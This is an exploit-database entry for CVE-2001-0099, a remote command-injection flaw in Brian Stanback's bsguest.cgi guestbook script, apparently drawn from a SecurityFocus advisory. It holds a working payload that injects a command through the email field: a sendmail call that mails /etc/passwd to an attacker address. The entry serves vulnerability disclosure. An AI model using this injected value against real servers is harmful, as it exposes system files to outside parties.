Brian Stanback bsguest.cgi 1.0 - Remote Command Execution

Author: rivendell_team
type: remote
platform: cgi
port: 
date_added: 2000-12-20  
date_updated: 2012-08-14  
verified: 1  
codes: CVE-2001-0099;OSVDB-7162  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20524.txt  
source: https://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <whitehatjoe@hotmail.com>

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.